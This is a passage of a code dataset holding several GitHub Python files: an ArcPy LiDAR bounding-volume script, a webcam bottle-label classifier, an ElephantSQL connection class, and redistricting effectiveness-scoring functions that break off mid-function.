+{"seq_id":"32235914907","text":"########################################################################################################################\n# File name: 2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py\n# Author: Mike Gough\n# Date created: 06/05/2023\n# Python Version: 3.x\n# Description:\n# Calculates the minimum bounding volume for a set of pre-processed LiDAR point returns.\n# Requires a fishnet with X,Y coordinates of the centroid (spatial join with fishnet labels), and a set of input points\n# with a z value and height_above_ground.\n########################################################################################################################\n\nimport arcpy\nimport math\narcpy.env.overwriteOutput = True\n\ninput_fishnet_with_xy = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Inputs\\Volume\\Vector_Fishnets.gdb\\Fishnet_LiDAR_Point_Extent_1_Tower_Location_For_Volume_Calculation_Join_XY\"\ninput_point_with_z = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\Lidar_Points_with_Elevation_Extent_1_Tower_Location\"\nintersect_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\LiDAR_Points_with_X_Y_Z_Index\"\n\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_envelope\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_sphere\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_convex_hull\"\noutput_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_concave_hull\"\n\nprint(\"Intersecting Fishnet and Input Points\")\narcpy.Intersect_analysis([input_point_with_z, input_fishnet_with_xy], intersect_fc, \"ALL\")\narcpy.AddField_management(intersect_fc, \"Z_Index\")\n\nprint(\"Removing ground points. Adding integer based Z-Index\")\nwith arcpy.da.UpdateCursor(intersect_fc, [\"Z_Max\", \"height_from_ground\", \"Z_Index\"]) as uc:\n for row in uc:\n z_index = math.floor(row[1])\n if z_index == 0:\n uc.deleteRow()\n else:\n row[2] = z_index\n uc.updateRow(row)\n\n# Notes: Sphere creates volumes that extend beyond the 3D cubes.\narcpy.ddd.MinimumBoundingVolume(intersect_fc, \"Z_Max\", output_fc, \"CONCAVE_HULL\", \"LIST\", \"POINT_X;POINT_Y;Z_Index\", \"MBV_FIELDS\")\n\narcpy.AddField_management(output_fc, \"MBV_Percent\", \"DOUBLE\")\n\nwith arcpy.da.UpdateCursor(output_fc, [\"MBV_Volume\", \"MBV_Percent\"]) as uc:\n for row in uc:\n volumetric_percent = row[0] / 1 * 100\n row[1] = volumetric_percent\n uc.updateRow(row)\n\n\n\n","repo_name":"consbio/CALFIRE-Decision-support-system-2021-Wind","sub_path":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_name":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30656699262","text":"import tensorflow # 딥러닝\nimport numpy as np # 수치계산\nimport cv2 # opencv2\nimport pyautogui # 마우스 x, y 좌표 확인용\nimport time # 시간 사용\n\nWINDOW_NAME = 'plasticBottleHelper'\ncheck_screen = 1 # 1: 카메라 화면, 2: 라벨 X, 3: 라벨 O\nprev_time = 0\nFPS = 10\nprediction_value = 0.98\n\n# 모델 위치\nmodel_filename = '/plasticBottleHelper/converted_keras/keras_model.h5'\nimg_filename1 = '/plasticBottleHelper/image1.png'\nimg_filename2 = '/plasticBottleHelper/image2.png'\n\n# 케라스 모델 가져오기\nmodel = tensorflow.keras.models.load_model(model_filename)\n\n# 카메라를 제어할 수 있는 객체\n# 외부 웹캠으로 비디오 캡처 초기화\ncapture = cv2.VideoCapture(1)\n# 외부 웹캠이 없다면 내장 웹캠을 사용\nif not capture.read()[0]:\n capture = cv2.VideoCapture(0)\n\n# Full screen mode\ncv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)\ncv2.setWindowProperty(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n# 마우스 이벤트\ndef mouse_event(event, x, y, flags, param): \n global check_screen\n \n if event == cv2.EVENT_LBUTTONDOWN:\n if (check_screen != 1) & (1280 < X < 2515) & (1140 < Y < 1412):\n check_screen = 1\n\nwhile True:\n # 프레임 계산 10fps\n current_time = time.time() - prev_time\n \n if check_screen == 1:\n # 비디오를 한 프레임씩 읽기\n ret, frame = capture.read()\n if not ret:\n break\n\n # 비디오 좌우 반전\n # frame = cv2.flip(frame, 1)\n # 비디오 상하 반전\n # frame = cv2.flip(frame, 0)\n\n # 비디오 크기 재설정\n frame_resize = frame[:, 80:80+frame.shape[0]]\n frame_input = cv2.resize(frame_resize, (224, 224))\n\n frame_input = cv2.cvtColor(frame_input, cv2.COLOR_BGR2RGB)\n frame_input = (frame_input.astype(np.float32) / 127.0) - 1\n frame_input = np.expand_dims(frame_input, axis=0)\n\n prediction = model.predict(frame_input)\n \n cv2.rectangle(frame, (80, 0), (80+frame.shape[0], frame.shape[0]), (0, 0, 255), 5)\n cv2.putText(frame, str(round(prediction[0, 0], 5)), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 1], 5)), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 2], 5)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n \n else:\n X, Y = pyautogui.position()\n H, W = frame.shape[:2]\n \n if check_screen == 2:\n frame = cv2.imread(img_filename1)\n else: # if check_screen == 3:\n frame = cv2.imread(img_filename2)\n \n # 버튼 \n cv2.setMouseCallback(WINDOW_NAME, mouse_event, frame)\n cv2.putText(frame, \"X : \" + str(X), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"Y : \" + str(Y), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"H : \" + str(H), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"W : \" + str(W), (10, 90), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n\n # 종료 버튼 0xFF == 64bit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n check_screen = 1\n\n if(prediction[0, 0] > prediction[0, 1]):\n if (prediction[0, 0] > prediction_value):\n check_screen = 2\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n if(prediction[0, 1] > prediction[0, 0]):\n if (prediction[0, 1] > prediction_value):\n check_screen = 3\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n # 출력\n if (ret is True) & (current_time > 1./ FPS) :\n prev_time = time.time()\n cv2.imshow(WINDOW_NAME, frame)\n\n# 비디오 캡처 개체 해제\ncapture.release()\ncv2.destroyAllWindows()","repo_name":"mikwain09/plastic_bottle_helper","sub_path":"plastic_bottle_helper.py","file_name":"plastic_bottle_helper.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33207814597","text":"import psycopg2\nimport os\nfrom Connection import Connection\nimport urllib.parse as up\n\n\nclass ElephantConnection(Connection):\n\n def __init__(self):\n super().__init__()\n\n def connect(self):\n try:\n\n # read connection parameters\n params = self.config(section='elephantsql')\n\n up.uses_netloc.append(\"postgres\")\n super().conn = psycopg2.connect(\n database=params['database'],\n user=params['user'],\n password=params['password'],\n host=params['host'],\n port=params['port']\n )\n print('Connect to the PostgreSQL on ElephantSQL successfully')\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n","repo_name":"chirunnuj/python-database-tutorial","sub_path":"ElephantConnection.py","file_name":"ElephantConnection.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"166286422","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 28 15:50:57 2020\n\n@author: darac\n\"\"\"\nimport random\nimport networkx as nx\nimport csv\nimport os\nimport shutil\nfrom functools import partial\nimport json\nimport math\nimport numpy as np\nimport geopandas as gpd\nimport matplotlib\n# matplotlib.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport pandas as pd\nimport collections\nfrom enum import Enum\nimport re\nimport scipy\nfrom scipy import stats\nimport time\nimport heapq\nimport operator\n\n\n# modification of https://github.com/mggg/VRA_ensembles/TX/run_functions.py\n\n\nDIR = ''\n\n\ndef precompute_state_weights(num_districts, elec_sets, elec_set_dict, recency_W1, EI_statewide, primary_elecs, \\\n runoff_elecs, elec_match_dict, min_cand_weights_dict, cand_race_dict):\n \"\"\"\n Returns election weights for state and equal scores for Black, Latino and Neither\n effectivness. Election weights are the same across districts for these scores, as they \n use statewide candidate preferences (and all weights = 1 for the equal score). It also returns\n dataframes of statewide Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n black_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_prim_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_prim_state[\"Election Set\"] = elec_sets\n black_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n\n black_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) & \\\n (EI_statewide[\"Demog\"] == 'BCVAP')), \"prob\"].values[0] \\\n for elec_set in elec_sets]\n\n black_ei_conf = [prob_conf_conversion(x) for x in black_ei_prob]\n black_conf_W3_state = np.tile(black_ei_conf, (num_districts, 1)).transpose()\n\n hisp_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) &\n (EI_statewide[\"Demog\"] == 'HCVAP')), \"prob\"].values[0]\n for elec_set in elec_sets]\n\n hisp_ei_conf = [prob_conf_conversion(x) for x in hisp_ei_prob]\n hisp_conf_W3_state = np.tile(hisp_ei_conf, (num_districts, 1)).transpose()\n\n neither_ei_conf = [prob_conf_conversion(x * y) for x, y in zip(black_ei_prob, hisp_ei_prob)]\n neither_conf_W3_state = np.tile(neither_ei_conf, (num_districts, 1)).transpose()\n\n # pre-compute W2 and W3 for statewide/equal modes\n for elec in primary_elecs + runoff_elecs:\n black_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'BCVAP')), \"Candidate\"].values[\n 0]\n hisp_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'HCVAP')), \"Candidate\"].values[\n 0]\n\n for district in range(num_districts):\n if elec in primary_elecs:\n black_pref_cands_prim_state.at[\n black_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = black_pref_cand\n hisp_pref_cands_prim_state.at[\n hisp_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n else:\n black_pref_cands_runoffs_state.at[\n black_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = black_pref_cand\n hisp_pref_cands_runoffs_state.at[\n hisp_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n min_cand_black_W2_state, min_cand_hisp_W2_state, min_cand_neither_W2_state = compute_W2(elec_sets, \\\n range(num_districts),\n min_cand_weights_dict,\n black_pref_cands_prim_state,\n hisp_pref_cands_prim_state,\n cand_race_dict)\n\n # compute final election weights (for statewide and equal scores) by taking product of W1, W2,\n # and W3 for each election set and district #Note: because these are statewide weights,\n # an election set will have the same weight across districts\n black_weight_state = recency_W1 * min_cand_black_W2_state * black_conf_W3_state\n hisp_weight_state = recency_W1 * min_cand_hisp_W2_state * hisp_conf_W3_state\n neither_weight_state = recency_W1 * min_cand_neither_W2_state * neither_conf_W3_state\n\n # equal-score weights are all 1\n black_weight_equal = np.ones((len(elec_sets), num_districts))\n hisp_weight_equal = np.ones((len(elec_sets), num_districts))\n neither_weight_equal = np.ones((len(elec_sets), num_districts))\n\n return black_weight_state, hisp_weight_state, neither_weight_state, black_weight_equal, \\\n hisp_weight_equal, neither_weight_equal, black_pref_cands_prim_state, hisp_pref_cands_prim_state, \\\n black_pref_cands_runoffs_state, hisp_pref_cands_runoffs_state\n\n\ndef compute_district_weights(dist_changes, elec_sets, elec_set_dict, state_gdf, partition, prec_draws_outcomes, \\\n geo_id, primary_elecs, runoff_elecs, elec_match_dict, bases, outcomes, \\\n recency_W1, cand_race_dict, min_cand_weights_dict):\n \"\"\"\n Returns election weights for the district score for Black, Latino and Neither\n effectiveness. Election weights differ across districts, as it uses district-specific preferred\n candidates. It also returns dataframes of district-specific\n Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n\n black_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n # store runoff preferences for instances where minority-preferred candidate needs to switch between primary and runoff\n black_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n\n black_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n hisp_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n neither_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n\n for district in dist_changes:\n state_gdf[\"New Map\"] = state_gdf.index.map(dict(partition.assignment))\n dist_prec_list = list(state_gdf[state_gdf[\"New Map\"] == district][geo_id])\n dist_prec_indices = state_gdf.index[state_gdf[geo_id].isin(dist_prec_list)].tolist()\n district_support_all = cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes)\n\n black_pref_prob_single_dist = []\n hisp_pref_prob_single_dist = []\n\n for elec_set in elec_sets:\n HCVAP_support_elec = district_support_all[('HCVAP', elec_set_dict[elec_set]['Primary'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_prob_dist = HCVAP_support_elec[hisp_pref_cand_dist]\n hisp_pref_prob_single_dist.append(hisp_pref_prob_dist)\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Primary'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_prob_dist = BCVAP_support_elec[black_pref_cand_dist]\n black_pref_prob_single_dist.append(black_pref_prob_dist)\n\n black_pref_cands_prim_dist.at[\n black_pref_cands_prim_dist[\"Election Set\"] == elec_set, district] = black_pref_cand_dist\n hisp_pref_cands_prim_dist.at[\n hisp_pref_cands_prim_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n if 'Runoff' in elec_set_dict[elec_set].keys():\n HCVAP_support_elec = district_support_all[('HCVAP', elec_set_dict[elec_set]['Runoff'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_cands_runoffs_dist.at[\n hisp_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Runoff'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_cands_runoffs_dist.at[\n black_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = black_pref_cand_dist\n\n black_pref_conf_single_dist = [prob_conf_conversion(x) for x in black_pref_prob_single_dist]\n black_conf_W3_dist = np.append(black_conf_W3_dist, np.array([black_pref_conf_single_dist]).transpose(), axis=1)\n\n hisp_pref_conf_single_dist = [prob_conf_conversion(x) for x in hisp_pref_prob_single_dist]\n hisp_conf_W3_dist = np.append(hisp_conf_W3_dist, np.array([hisp_pref_conf_single_dist]).transpose(), axis=1)\n\n neither_pref_conf_single_dist = [prob_conf_conversion(x * y) for x, y in\n zip(black_pref_prob_single_dist, hisp_pref_prob_single_dist)]\n neither_conf_W3_dist = np.append(neither_conf_W3_dist, np.array([neither_pref_conf_single_dist]).transpose(),\n axis=1)\n\n # compute W2 (\"in-group\"-minority-preference weight)\n min_cand_black_W2_dist, min_cand_hisp_W2_dist, min_cand_neither_W2_dist = compute_W2(elec_sets, \\\n dist_changes,\n min_cand_weights_dict,\n black_pref_cands_prim_dist,\n hisp_pref_cands_prim_dist,\n cand_race_dict)\n ################################################################################ \n # compute final election weights per district\n recency_W1 = recency_W1.copy()[:, dist_changes]\n black_weight_dist = recency_W1 * min_cand_black_W2_dist * black_conf_W3_dist\n hisp_weight_dist = recency_W1 * min_cand_hisp_W2_dist * hisp_conf_W3_dist\n neither_weight_dist = recency_W1 * min_cand_neither_W2_dist * neither_conf_W3_dist\n\n return black_weight_dist, hisp_weight_dist, neither_weight_dist, black_pref_cands_prim_dist, \\\n black_pref_cands_runoffs_dist, hisp_pref_cands_prim_dist, hisp_pref_cands_runoffs_dist\n\n\ndef prob_conf_conversion(cand_prob):\n # parameters chosen to be ~0 confidence until 50% then rapid ascension to confidence ~ 1\n cand_conf = 1 / (1 + np.exp(18 - 26 * cand_prob))\n return cand_conf\n\n\ndef compute_final_dist(map_winners, black_pref_cands_df, black_pref_cands_runoffs, \\\n hisp_pref_cands_df, hisp_pref_cands_runoffs, neither_weight_array, \\\n black_weight_array, hisp_weight_array, dist_elec_results, dist_changes,\n cand_race_table, num_districts, candidates, \\\n elec_sets, elec_set_dict, mode, partition, logit_params, logit=False):\n \"\"\"\n Returns (Latino, Black, Neither, Overlap) effectiveness distribution for each district. \n The four values sum to one. State-specific rules governing what counts as a \"win\" for \n an election set are coded here (for example, rules about advancing to runoff elections etc.).\n \"\"\"\n general_winners = map_winners[map_winners[\"Election Type\"] == 'General'].reset_index(drop=True)\n primary_winners = map_winners[map_winners[\"Election Type\"] == 'Primary'].reset_index(drop=True)\n runoff_winners = map_winners[map_winners[\"Election Type\"] == 'Runoff'].reset_index(drop=True)\n\n black_pref_wins = np.empty((len(elec_sets), 0), float)\n hisp_pref_wins = np.empty((len(elec_sets), 0), float)\n\n primary_second_df = pd.DataFrame(columns=range(num_districts))\n primary_second_df[\"Election Set\"] = elec_sets\n\n prim_share_hpc = pd.DataFrame(columns=range(num_districts))\n prim_share_hpc[\"Election Set\"] = elec_sets\n prim_share_bpc = pd.DataFrame(columns=range(num_districts))\n prim_share_bpc[\"Election Set\"] = elec_sets\n party_gen_winner = pd.DataFrame(columns=range(num_districts))\n party_gen_winner[\"Election Set\"] = elec_sets\n\n primary_races = [elec_set_dict[elec_set][\"Primary\"] for elec_set in elec_sets]\n runoff_races = [None if 'Runoff' not in elec_set_dict[elec_set].keys() else elec_set_dict[elec_set][\"Runoff\"] for\n elec_set in elec_sets]\n cand_party_dict = cand_race_table.set_index(\"Candidates\").to_dict()[\"Party\"]\n\n for dist in dist_changes:\n black_pref_cands = list(black_pref_cands_df[dist])\n hisp_pref_cands = list(hisp_pref_cands_df[dist])\n\n primary_dict = primary_winners.set_index(\"Election Set\").to_dict()[dist]\n general_dict = general_winners.set_index(\"Election Set\").to_dict()[dist]\n runoffs_dict = runoff_winners.set_index(\"Election Set\").to_dict()[dist]\n primary_winner_list = [primary_dict[es] for es in elec_sets]\n general_winner_list = [general_dict[es] for es in elec_sets]\n runoff_winner_list = [\"N/A\" if es not in list(runoff_winners[\"Election Set\"]) \\\n else runoffs_dict[es] for es in elec_sets]\n\n primary_race_share_dict = {primary_race: dist_elec_results[primary_race][dist] for primary_race in\n primary_races}\n primary_ranking = {primary_race: {key: rank for rank, key in \\\n enumerate(sorted(primary_race_share_dict[primary_race], \\\n key=primary_race_share_dict[primary_race].get, reverse=True),\n 1)} \\\n for primary_race in primary_race_share_dict.keys()}\n\n second_place_primary = {primary_race: [cand for cand, value in primary_ranking[primary_race].items() \\\n if primary_ranking[primary_race][cand] == 2] for primary_race in\n primary_races}\n\n primary_second_df[dist] = [second_place_primary[key][0] for key in second_place_primary.keys()]\n\n black_pref_prim_rank = [primary_ranking[pr][bpc] for pr, bpc in zip(primary_races, black_pref_cands)]\n hisp_pref_prim_rank = [primary_ranking[pr][hpc] for pr, hpc in zip(primary_races, hisp_pref_cands)]\n\n prim_share_hpc[dist] = [primary_race_share_dict[prim_race][hpc] for prim_race, hpc in\n zip(primary_races, hisp_pref_cands)]\n prim_share_bpc[dist] = [primary_race_share_dict[prim_race][bpc] for prim_race, bpc in\n zip(primary_races, black_pref_cands)]\n party_general_winner = [cand_party_dict[gw] for gw in general_winner_list]\n party_gen_winner[dist] = party_general_winner\n\n # we always care who preferred candidate is in runoff if the minority preferred primary\n # candidate wins in district primary\n runoff_black_pref = [\"N/A\" if rw == \"N/A\" else \\\n bpc for rw, bpc in zip(runoff_winner_list, list(black_pref_cands_runoffs[dist]))]\n\n runoff_hisp_pref = [\"N/A\" if rw == \"N/A\" else \\\n hpc for rw, hpc in zip(runoff_winner_list, list(hisp_pref_cands_runoffs[dist]))]\n\n # winning conditions (conditions to accrue points for election set/minority group):\n black_accrue = [(prim_win == bpc and party_win == 'D') if run_race == None else \\\n ((bpp_rank < 3 and run_win == runbp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][bpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, bpc, party_win, bpp_rank, run_win, runbp, prim_race \\\n in zip(runoff_races, primary_winner_list, black_pref_cands, \\\n party_general_winner, black_pref_prim_rank, runoff_winner_list, \\\n runoff_black_pref, primary_races)]\n\n black_pref_wins = np.append(black_pref_wins, np.array([black_accrue]).transpose(), axis=1)\n\n hisp_accrue = [(prim_win == hpc and party_win == 'D') if run_race == None else \\\n ((hpp_rank < 3 and run_win == runhp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][hpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, hpc, party_win, hpp_rank, run_win, runhp, \\\n prim_race in zip(runoff_races, primary_winner_list, hisp_pref_cands, \\\n party_general_winner, hisp_pref_prim_rank, runoff_winner_list, \\\n runoff_hisp_pref, primary_races)]\n\n hisp_pref_wins = np.append(hisp_pref_wins, np.array([hisp_accrue]).transpose(), axis=1)\n\n neither_pref_wins = (1 - black_pref_wins) * (1 - hisp_pref_wins)\n\n if len(black_weight_array[0]) > 2:\n black_weight_array = black_weight_array[:, dist_changes]\n hisp_weight_array = hisp_weight_array[:, dist_changes]\n neither_weight_array = neither_weight_array[:, dist_changes]\n\n # election set weight's number of points are accrued if Black or Latino preferred candidate(s) win (or proxies do)\n neither_points_accrued = neither_weight_array * neither_pref_wins\n black_points_accrued = black_weight_array * black_pref_wins\n hisp_points_accrued = hisp_weight_array * hisp_pref_wins\n\n #####################################################################################\n # Compute district probabilities: Black, Latino, Neither and Overlap\n black_vra_elec_wins = list(np.sum(black_points_accrued, axis=0) / np.sum(black_weight_array, axis=0))\n black_gc = [min(1, (partition[\"BCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n black_vra_prob = [i * j for i, j in zip(black_vra_elec_wins, black_gc)]\n\n hisp_vra_elec_wins = list(np.sum(hisp_points_accrued, axis=0) / np.sum(hisp_weight_array, axis=0))\n hisp_gc = [min(1, (partition[\"HCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n hisp_vra_prob = [i * j for i, j in zip(hisp_vra_elec_wins, hisp_gc)]\n\n neither_vra_prob = list(np.sum(neither_points_accrued, axis=0) / np.sum(neither_weight_array, axis=0))\n\n # feed through logit:\n if logit == True:\n logit_coef_black = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'coef'].values[0]\n logit_intercept_black = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'intercept'].values[0]\n logit_coef_hisp = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'coef'].values[\n 0]\n logit_intercept_hisp = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'intercept'].values[0]\n logit_coef_neither = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'coef'].values[\n 0]\n logit_intercept_neither = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'intercept'].values[0]\n\n black_vra_prob = [1 / (1 + np.exp(-(logit_coef_black * y + logit_intercept_black))) for y in black_vra_prob]\n hisp_vra_prob = [1 / (1 + np.exp(-(logit_coef_hisp * y + logit_intercept_hisp))) for y in hisp_vra_prob]\n neither_vra_prob = [1 / (1 + np.exp(-(logit_coef_neither * y + logit_intercept_neither))) for y in\n neither_vra_prob]\n\n min_neither = [0 if (black_vra_prob[i] + hisp_vra_prob[i]) > 1 else 1 - (black_vra_prob[i] + hisp_vra_prob[i]) for i\n in range(len(dist_changes))]\n max_neither = [1 - max(black_vra_prob[i], hisp_vra_prob[i]) for i in range(len(dist_changes))]\n\n # uses ven diagram overlap/neither method\n final_neither = [round(min_neither[i], 3) if neither_vra_prob[i] < min_neither[i] else round(max_neither[i], 3) \\\n if neither_vra_prob[i] > max_neither[i] else round(neither_vra_prob[i], 3) for i in range(len(dist_changes))]\n final_overlap = [round(final_neither[i] + black_vra_prob[i] + hisp_vra_prob[i] - 1, 3) for i in\n range(len(dist_changes))]\n final_black_prob = [round(black_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n final_hisp_prob = [round(hisp_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n\n # when fitting logit, comment in:\n # final_neither = neither_vra_prob\n # final_overlap = [\"N/A\"]*len(dist_changes)\n # final_black_prob = black_vra_prob #[black_vra_prob[i] - final_overlap[i] for i in range(len(dist_changes))]\n # final_hisp_prob = hisp_vra_prob\n\n return dict(zip(dist_changes, zip(final_hisp_prob, final_black_prob, final_neither, final_overlap)))\n\n\ndef compute_W2(elec_sets, districts, min_cand_weights_dict, black_pref_cands_df, hisp_pref_cands_df, \\\n cand_race_dict):\n \"\"\"\n Returns in-group preferred candidate election weight (W2). This weight is 1 if the Latino-preferred\n candidate is Latino, etc.\n \"\"\"\n\n min_cand_black_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_hisp_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_neither_W2 = np.empty((len(elec_sets), 0), float)\n\n for dist in districts:\n black_pref = list(black_pref_cands_df[dist])\n\n black_pref_race = [cand_race_dict[bp] for bp in black_pref]\n black_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Black\" in bpr else \\\n min_cand_weights_dict[\"Other\"] for bpr in black_pref_race]\n min_cand_black_W2 = np.append(min_cand_black_W2, np.array([black_cand_weight]).transpose(), axis=1)\n\n hisp_pref = list(hisp_pref_cands_df[dist])\n hisp_pref_race = [cand_race_dict[hp] for hp in hisp_pref]\n hisp_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Hispanic\" in hpr else \\\n min_cand_weights_dict[\"Other\"] for hpr in hisp_pref_race]\n min_cand_hisp_W2 = np.append(min_cand_hisp_W2, np.array([hisp_cand_weight]).transpose(), axis=1)\n\n neither_cand_weight = [min_cand_weights_dict['Relevant Minority'] if ('Hispanic' in hpr and 'Black' in bpr) else \\\n min_cand_weights_dict['Other'] if ('Hispanic' not in hpr and 'Black' not in bpr) else \\\n min_cand_weights_dict['Partial '] for bpr, hpr in\n zip(black_pref_race, hisp_pref_race)]\n min_cand_neither_W2 = np.append(min_cand_neither_W2, np.array([neither_cand_weight]).transpose(), axis=1)\n\n return min_cand_black_W2, min_cand_hisp_W2, min_cand_neither_W2\n\n\ndef cand_pref_all_draws_outcomes(prec_quant_df, precs, bases, outcomes, sample_size=1000):\n \"\"\"\n To aggregrate precinct EI to district EI for district model score\n \"\"\"\n quant_vals = np.array([0, 125, 250, 375, 500, 625, 750, 875, 1000])\n draws = {}\n for outcome in outcomes.keys():\n draw_base_list = []\n for base in outcomes[outcome]:\n dist_prec_quant = prec_quant_df.copy()\n vec_rand = np.random.rand(sample_size, len(dist_prec_quant))\n vec_rand_shift = np.array(dist_prec_quant[base + '.' + '0']) + sum(\n np.minimum(np.maximum(vec_rand - quant_vals[qv] / 1000, 0), .125) * 8 * np.array(\n dist_prec_quant[base + '.' + str(quant_vals[qv + 1])] - dist_prec_quant[\n base + '.' + str(quant_vals[qv])]) for qv in range(len(quant_vals) - 1))\n draw_base_list.append(vec_rand_shift.astype('float32').T)\n draws[outcome] = np.transpose(np.stack(draw_base_list), (1, 0, 2))\n return draws\n\n\ndef cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes):\n dist_draws = {}\n for outcome in outcomes:\n 